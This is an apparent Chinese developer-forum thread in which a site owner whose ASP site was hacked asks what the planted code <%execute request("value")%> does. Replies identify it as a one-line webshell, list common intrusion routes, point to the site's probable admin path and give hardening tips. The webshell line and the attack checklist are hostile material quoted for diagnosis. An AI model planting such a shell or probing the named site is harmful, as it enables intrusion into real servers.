急,帮我检查网站的漏洞,顶者有分
网站的网址是:http:www.home77.com
以前被人上传过木马,后来都被我清掉了,我是用木马扫描器清除的,现在还是有人能进后台,我不知道是怎么进的,难道我的网站有漏洞吗?我确实找不到是什么原因,请大家帮帮忙,能否找到我的网站后台地址,能否注入等,昨天晚上有人进入了后台,乱改一通,在新闻的作者里加上<%execute request( "value ")%>,其他的地方也加了,加这个东西是做什么用的?谢谢!
[解决办法]
传说中的一句话木马,帮顶了!
[解决办法]
你后台安全有问题,数据库是MDB改ASP的
有时间可以聊聊
QQ:77273364
[解决办法]
帮忙顶一下
[解决办法]
你要对用户的所有输入进行尽可能严格的验证,并且,把这些输入的数据,进行必要的转换,防止输入式攻击。有兴趣加我QQ125800731,注明CSDN
[解决办法]
怕怕。。
[解决办法]
楼主最好也能找些安全工具扫描一下你的服务器的漏洞,不一定完全就是你的网站的问题,很多时候服务器也会造成入侵
[解决办法]
MDB数据库防在站点外或者改名为global.asa放在二级目录下面,不要防在根目录下,回打不开网站!
[解决办法]
为何打不开你的网站
[解决办法]
<%execute request( "value ")%>
用来执行request到的文件名
[解决办法]
http://www.home77.com/admin/
很显然
管理页面在这个目录下
[解决办法]
网站都打不开.
情况无非有以下几种:
1.后台密码别人已经知道.可以通过添加文章来~~
2.权限已经被别人拿了.没有办法。慢慢找了。当然也有工具。
3.服务器权限被别人拿了。这个!!嘿嘿!!!
[解决办法]
现在是能打开了,我这边是网通的,有点慢。
自己找吧!都TMD星期六大家还工作。
[解决办法]
网站很齐整,~~
树大招风,劝你找高手解决下..
http://www.xfocus.net/
这个站高手多...
[解决办法]
LZ是在东莞工作?
[解决办法]
up ..
[解决办法]
execute request( "value ")
这个东东用处大了....
我从本机建一个html文件。
随便写一段xxx的代码,用表单post到你的页面上去。
[解决办法]
1、注入
2、上传
3、数据库写一句话小马
4、服务嚣本身安全
5、ser-u安全
6、后以密码简单
7、备份木马
8、SQL 溢出
9、SQL差异备份木马
10、IIS可写木马
11、旁注入侵
www.virus8.net/gd
[解决办法]
看了楼上的顿悟,execute还有这用法。
MARK下,帮顶。
[解决办法]
这个就是传说中的一句话木马,你搜索下就知道了。有很多的变形..
[解决办法]
网站打开速度非常慢
[解决办法]
海阳ASP木马好象就是这样的.
[解决办法]
有分干嘛不顶
[解决办法]
我也顶,关注一下,很想知道是如何攻击别人的网站的.
